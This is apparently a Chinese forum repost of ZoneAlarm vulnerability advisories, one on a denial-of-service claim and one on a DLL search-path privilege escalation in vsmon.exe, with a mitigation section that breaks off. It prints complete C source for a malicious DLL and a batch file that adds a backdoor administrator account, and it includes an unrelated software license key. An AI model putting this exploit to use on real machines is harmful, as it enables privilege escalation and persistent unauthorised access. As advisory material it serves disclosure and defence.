【警告】ZoneAlarm的所有版本存在拒絕服務漏洞
(轉自防毒論壇)
ZoneAlarm remote exploit
文章作者:6mO_HaCk
A denial of service exploit has been discovered for all ZoneAlarm verions .. this remote exploit was succesfully tested on windows xp(home and professional edition), windows98 .. so far ZoneLab didnt released any patch for this issue .
THe only solution given so far is to close ZoneAlarm until an update is released .. or move to another firewall like Tiny Personal Firewall
下面由我簡單翻譯一下
目前有一個針對所有版本的ZoneAlarm軟體的拒絕服務攻擊程式碼。
這組攻擊程式碼已經成功地在windowsXP 和98等作業系統上通過了測試(註:也就是說這組程式碼能夠成功地對ZA進行攻擊)至今ZONE LAB沒有發怖任何針對這個漏洞的修正檔。
目前唯一的辦法 就是關閉ZA或用其他的防火牆替代。
軟體簡介:
逸凡一直用的網路防火牆,使用很簡單,你只要在安裝時填入你的資料,安
裝完後重新開機,ZoneAlarm 就會自動啟動,幫你執行工作。你可以自由設定所
有程序是否允許連接Internet,利用此種方法來防治一些來路不明的軟體偷偷上
網。最好的方法是鎖住(Lock)網路不讓任何程序通過,只有你核准的軟體才可
以通行無阻。你還可利用它來看看你開機後已經使用多少網路資源,也可以設定
鎖定網路的時間,這麼好用的軟體你一定要親自使用才能感覺到它的威力。
Code:hh11s-pv5cu-batbk-1mvdqe-md0gc0
Zone Labs ZoneAlarm Security Suite build 6.1.744.000 漏洞及解決辦法
用這個版本的ZA軟體的用戶注意了.
受影響系統:
Zone Labs ZoneAlarm Security Suite build 6.1.744.000
描述:
--------------------------------------------------------------------------------
ZoneAlarm是一款個人電腦防火牆,能保護個人資料和隱私安全。
ZoneAlarm的TrueVector服務在啟動載入DLL時存在問題,攻擊者可能利用此漏洞在主機上執行權限提升攻擊。
在Windows啟動程序中ZoneAlarm的TrueVector服務(vsmon.exe)被設定為自動啟動。TrueVector服務是以本機系統帳號權限執行的,在啟動程序中會試圖載入以下幾個DLL:
- VSUTIL_Loc0409_Oem8701.dll
- VSUTIL_Oem8701.dll
- VSUTIL_Loc0409.dll
- vsmon_Loc0409_Oem8701.dll
- vsmon_Oem8701.dll
- vsmon_Loc0409.dll
- VSRULEDB_Loc0409_Oem8701.dll
- VSRULEDB_Oem8701.dll
- VSRULEDB_Loc0409.dll
- av_Loc0409_Oem8701.dll
- av_Oem8701.dll
- av_Loc0409.dll
- zlquarantine_Loc0409_Oem8701.dll
- zlquarantine_Oem8701.dll
- zlquarantine_Loc0409.dll
- zlsre_Loc0409_Oem8701.dll
- zlsre_Oem8701.dll
- zlsre_Loc0409.dll
在載入工作程序中沒有使用到DLL的完整路徑,而僅使用了DLL的名稱,這可能導致vsmon.exe工作權限提升。
測試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
// ===== Start Magic.c ======
// Build Instructions
//
// gcc -c -DBUILD_DLL magic.c
// gcc -shared -o magic.dll -W1,--out-implib,libkernel32.a magic.o
#include <windows.h>
VOID RunMagicBatFile( VOID );
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
BOOLEAN bSuccess = TRUE;
switch ( fdwReason )
{
case DLL_PROCESS_ATTACH:
RunMagicBatFile();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return bSuccess;
}
VOID RunMagicBatFile()
{
TCHAR szWinDir[ _MAX_PATH ];
TCHAR szCmdLine[ _MAX_PATH ];
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
wsprintf( szCmdLine, "%s//system32//cmd.exe /c magic.bat", szWinDir );
ZeroMemory( &si, sizeof( si ) );
si.cb = sizeof( si );
ZeroMemory( &pi, sizeof( pi ) );
CreateProcess( NULL, szCmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi );
CloseHandle( pi.hProcess );
CloseHandle( pi.hThread );
}
// ===== End Magic.c ======
// ===== Start Magic.bat ======
net user Magic M@g1c$$ /add
net localgroup Administrators Magic /add
// ===== End Magic.bat ======
建議:
--------------------------------------------------------------------------------
廠商修正檔:
Zone Labs
---------
目前廠商還沒有提供修正檔或者昇級程序,我們建議使用此軟體的用戶隨時關注廠商的主頁以獲取最新版本:
[red]由於是以本機系統權限做為執行的權限.所以NTFS的限制就不太好用了.也不太好起作用了.不過可以使用MVSE8的保護功能或者TINY的文件保護功能來防護[/red]
下面以MVSE8做個比方:
